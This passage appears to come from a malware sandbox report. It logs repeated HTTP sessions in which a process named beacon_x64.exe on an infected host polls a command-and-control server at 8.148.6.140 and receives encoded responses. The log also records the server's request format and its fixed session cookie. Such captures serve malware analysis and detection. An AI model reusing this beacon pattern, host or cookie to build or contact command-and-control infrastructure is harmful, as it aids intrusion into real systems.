Jan 10, 2025 09:27:38.986259937 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.6	50078	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:39.937341928 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.6	50079	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:44.063258886 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.6	50080	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:48.142606020 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.6	50081	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:49.111843109 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:50.095115900 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:49 GMT Server: nginx Content-Length: 300 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:27:50.095279932 CET	300	IN	Data Raw: 4b 6a 4a 65 49 4b 44 66 74 6f 75 62 71 70 51 76 48 62 31 57 64 54 42 72 6b 4b 43 41 31 6b 33 77 43 52 6e 53 52 34 6b 2f 76 61 65 5a 77 72 36 67 61 63 63 4a 69 37 4d 67 44 61 6b 71 58 6f 2f 63 51 6e 65 51 53 74 75 67 30 59 57 38 5a 53 4f 75 6c 70 Data Ascii: KjJeIKDftoubqpQvHb1WdTBrkKCA1k3wCRnSR4k/vaeZwr6gaccJi7MgDakqXo/cQneQStug0YW8ZSOulpD1txwclQMB/F/VBDEWaCGKgLzN21UHuFfGGXmWFpdio1wpz1QI96i07SkYMdlbeXguz+aRgxg1Of5zlefvBcQ8K+WG0KKRXphdAOq17SKcDEoUQRxfA2O0yt5OIFAoo2LHTgC4c01Jk3NjB1aO5hQoHp5hZjqfJMQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.6	50082	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:50.218101978 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:51.189567089 CET	421	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:51 GMT Server: nginx Content-Length: 236 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 74 2f 6f 39 6b 43 30 6a 52 53 48 5a 54 66 31 38 55 6b 4c 54 4f 4c 79 6b 69 54 7a 74 63 30 46 65 4c 54 45 35 36 77 58 49 65 61 54 79 6f 58 47 35 43 4d 2b 76 37 33 30 53 32 42 6a 57 67 58 31 59 44 51 61 6b 37 41 4b 35 63 36 62 63 6b 7a 42 54 44 2f 66 65 44 75 70 4b 38 6d 42 71 66 64 67 79 63 58 47 77 68 5a 67 7a 47 73 7a 43 70 58 4c 48 62 2f 51 69 34 6e 53 48 73 79 48 34 4f 70 57 4b 4f 79 59 36 79 56 30 55 47 72 41 4a 74 78 59 7a 7a 53 39 34 50 69 50 77 47 6c 5a 39 51 72 2b 42 4a 6e 55 6c 4d 35 34 52 57 63 47 34 65 6c 62 76 4a 5a 50 38 6e 31 49 6b 6c 54 73 45 38 72 4b 39 35 57 4f 30 31 6f 34 71 46 79 48 69 54 4f 4c 51 75 64 4d 52 67 31 4f 6f 31 5a 77 78 78 4e 59 58 48 69 55 7a 52 63 54 78 77 30 59 3d Data Ascii: t/o9kC0jRSHZTf18UkLTOLykiTztc0FeLTE56wXIeaTyoXG5CM+v730S2BjWgX1YDQak7AK5c6bckzBTD/feDupK8mBqfdgycXGwhZgzGszCpXLHb/Qi4nSHsyH4OpWKOyY6yV0UGrAJtxYzzS94PiPwGlZ9Qr+BJnUlM54RWcG4elbvJZP8n1IklTsE8rK95WO01o4qFyHiTOLQudMRg1Oo1ZwxxNYXHiUzRcTxw0Y=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.6	50083	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:51.311728954 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:52.312535048 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:52 GMT Server: nginx Content-Length: 320 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:27:52.312588930 CET	320	IN	Data Raw: 4b 56 6f 69 69 4e 44 57 67 75 68 63 6b 73 6c 52 6d 79 69 47 4b 47 4d 4e 32 4b 44 32 79 7a 59 5a 45 62 36 56 71 6a 33 4d 55 34 2f 44 78 2f 2f 44 5a 30 77 6f 48 75 73 51 30 66 2f 32 41 43 61 72 50 66 57 5a 6f 4b 6c 7a 51 4c 62 76 48 53 70 57 6a 41 Data Ascii: KVoiiNDWguhckslRmyiGKGMN2KD2yzYZEb6Vqj3MU4/Dx//DZ0woHusQ0f/2ACarPfWZoKlzQLbvHSpWjAl1RkgCZPreNc3X8ujGqgFaDStZ0zfrHP0G4nUUcH5Ne52TmQ68W0xddRGbtI8QW1OCO8DWE1eGGgs8rGskJ446XoP7LkUMllDn4ApCu9HkkHJi+Vx8AZA7sbL4u0cgHrw8Hk8kuCWVNRZtz0rng99JWfPqO4YQ8mm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.6	50084	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:52.592216015 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:54.126885891 CET	337	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:53 GMT Server: nginx Content-Length: 152 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 7a 75 4f 2b 43 54 66 5a 45 6b 37 58 73 74 58 57 78 65 53 43 71 49 32 4a 2f 36 55 73 30 4f 35 65 46 44 53 4d 68 73 6c 41 62 6d 63 35 63 56 75 76 6b 70 77 44 75 34 39 38 5a 6d 52 76 45 43 35 42 49 76 69 50 6b 68 38 48 72 55 36 53 75 6a 4f 77 39 2b 65 37 32 35 46 5a 4b 31 69 38 68 2f 64 36 30 49 51 52 6b 63 49 33 54 68 46 53 57 45 6d 31 71 70 46 63 39 4b 4c 48 6f 5a 31 4f 31 4c 4e 63 64 39 63 55 31 51 66 5a 6a 71 39 63 2f 56 57 52 77 34 76 7a 43 51 3d 3d Data Ascii: zuO+CTfZEk7XstXWxeSCqI2J/6Us0O5eFDSMhslAbmc5cVuvkpwDu498ZmRvEC5BIviPkh8HrU6SujOw9+e725FZK1i8h/d60IQRkcI3ThFSWEm1qpFc9KLHoZ1O1LNcd9cU1QfZjq9c/VWRw4vzCQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.6	50085	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:54.249459982 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.6	50086	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:55.233478069 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:56.215364933 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:56 GMT Server: nginx Content-Length: 320 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:27:56.215848923 CET	320	IN	Data Raw: 36 71 65 5a 41 4e 48 4e 4b 6d 78 5a 32 34 30 61 68 38 53 4c 68 4c 6d 53 4d 78 76 43 35 4a 47 42 49 35 7a 51 35 48 42 4e 7a 6f 6c 48 72 54 57 6b 6c 75 70 34 64 72 7a 46 48 4a 47 45 4f 57 58 38 34 63 32 6f 66 63 53 79 67 72 73 77 51 6c 6c 5a 4e 38 Data Ascii: 6qeZANHNKmxZ240ah8SLhLmSMxvC5JGBI5zQ5HBNzolHrTWklup4drzFHJGEOWX84c2ofcSygrswQllZN8V48+gRyZU8ws8AzV/cwRJ7wfCf+QtrYNSw3eypb8ndQPdmqDkpZ1r6bLBrtxlvbn9+hM+Fb7ipl8EsuqNUtPclyE1wsnj+hXbAaalmtizxIRcKYuPJV2p+nXGChiQJxUCldHs0vQ/BwD7Q9DTNhWBaF5N/kRrUTUe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.6	50087	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:56.327219963 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:27:58.822376966 CET	465	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:27:58 GMT Server: nginx Content-Length: 280 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 75 51 2b 30 53 4d 44 30 76 6b 43 38 31 62 44 43 44 68 4a 49 6b 6b 55 6e 33 2b 77 6d 58 51 2f 45 49 67 54 35 68 4e 71 33 77 6a 33 4e 74 63 35 4e 4e 66 77 58 6d 53 6c 47 65 58 66 78 4e 33 66 78 34 56 37 74 69 77 65 6b 50 52 7a 32 32 42 4d 51 71 38 47 76 4f 71 78 74 58 30 73 38 36 43 4d 42 78 72 68 6e 4e 4b 65 36 6a 31 70 59 33 46 70 6a 63 31 55 6b 56 78 4a 58 41 6a 49 45 65 35 5a 37 6b 2f 38 70 39 48 38 59 4d 49 36 70 54 54 69 59 39 4c 34 76 6d 43 30 78 32 71 58 73 71 4a 4a 35 4d 52 2b 6f 51 77 35 4c 36 57 42 49 54 62 61 64 51 65 79 30 4f 72 78 52 6b 5a 39 76 31 51 6d 6e 6d 42 48 74 5a 69 37 76 65 33 75 31 4f 45 6a 52 65 63 32 32 51 59 33 55 64 30 46 4f 61 4d 4d 69 53 71 45 44 56 34 59 4f 4e 74 72 57 46 4c 61 6c 48 47 64 38 4c 31 4f 47 64 42 6d 48 74 54 54 34 36 59 7a 45 37 6a 5a 75 42 38 46 71 76 34 54 57 75 67 6a 76 55 67 3d 3d Data Ascii: uQ+0SMD0vkC81bDCDhJIkkUn3+wmXQ/EIgT5hNq3wj3Ntc5NNfwXmSlGeXfxN3fx4V7tiwekPRz22BMQq8GvOqxtX0s86CMBxrhnNKe6j1pY3Fpjc1UkVxJXAjIEe5Z7k/8p9H8YMI6pTTiY9L4vmC0x2qXsqJJ5MR+oQw5L6WBITbadQey0OrxRkZ9v1QmnmBHtZi7ve3u1OEjRec22QY3Ud0FOaMMiSqEDV4YONtrWFLalHGd8L1OGdBmHtTT46YzE7jZuB8Fqv4TWugjvUg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.6	50088	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:58.939017057 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.6	50089	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:27:59.977205992 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.6	50090	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:00.967505932 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:04.911849976 CET	184	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:04 GMT Server: nginx Content-Length: 88 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:28:04.911871910 CET	88	IN	Data Raw: 32 79 55 4f 59 4c 39 4e 65 56 71 56 38 6e 4a 31 59 44 5a 4c 2f 61 50 47 2f 50 2b 4c 4f 46 4b 55 77 49 68 36 66 6e 59 30 45 77 70 36 65 49 36 32 69 4e 78 4d 2f 2f 56 48 6b 56 37 41 69 68 46 31 66 34 6a 55 77 58 42 5a 77 61 75 38 6b 4e 6c 48 38 75 Data Ascii: 2yUOYL9NeVqV8nJ1YDZL/aPG/P+LOFKUwIh6fnY0Ewp6eI62iNxM//VHkV7AihF1f4jUwXBZwau8kNlH8uVBsQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.6	50091	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:05.039238930 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:05.993217945 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:05 GMT Server: nginx Content-Length: 256 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:28:05.993228912 CET	256	IN	Data Raw: 42 31 6e 67 76 30 55 64 49 37 6a 5a 65 77 44 2f 66 62 52 64 7a 7a 32 71 68 79 71 51 57 34 70 43 39 63 6f 6a 5a 74 6c 6f 59 41 7a 59 63 4b 31 30 7a 52 52 57 51 61 52 63 42 6b 64 75 4b 51 42 43 44 70 41 75 45 4a 56 63 30 62 37 33 70 4f 6d 78 36 72 Data Ascii: B1ngv0UdI7jZewD/fbRdzz2qhyqQW4pC9cojZtloYAzYcK10zRRWQaRcBkduKQBCDpAuEJVc0b73pOmx6rH24LOq20NGMZvH1FPN7fGOQgl/Mq+XT30ihrveAt7D7p02Cfywk4G9yOxpMjlq8/ZJqx/6XyvgqcpptOtl/lq9gDMtlmu/RXm8aRtPKup5yTOSKoqmz2vhRVYR1rSkgRl2Pkkc2mBAM//LW3p9Ok3/R2C3A89ksll

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.6	50092	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:06.110570908 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:28:07.663578987 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:28:07 GMT Server: nginx Content-Length: 236 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:28:07.663634062 CET	236	IN	Data Raw: 32 54 71 68 55 64 55 39 75 36 6c 71 66 53 67 74 45 53 55 49 55 58 4a 48 48 59 43 74 68 64 47 57 59 4f 52 77 5a 77 44 45 64 7a 70 54 52 34 2f 2f 62 52 35 62 42 71 46 6b 31 58 78 44 74 53 49 38 58 51 54 59 4d 55 47 67 54 31 38 6b 71 67 4f 4a 4c 4b Data Ascii: 2TqhUdU9u6lqfSgtESUIUXJHHYCthdGWYORwZwDEdzpTR4//bR5bBqFk1XxDtSI8XQTYMUGgT18kqgOJLKdD8gGpZDkAMI5I/jEz+YFFVnbJ2FqR/jO6rihezWO412ixRbcEy3J+VXNYH/OtrtEzaYPkPpQkz3QXE+WOkjSU6AwqbMz8yiYS4FWxJm+JhLTCoeO3KntUNiQdoEa8B1iDfUgJuycrGSYmA7zcgf/vgM8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.6	50093	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:28:07.780637980 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.6	50094	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
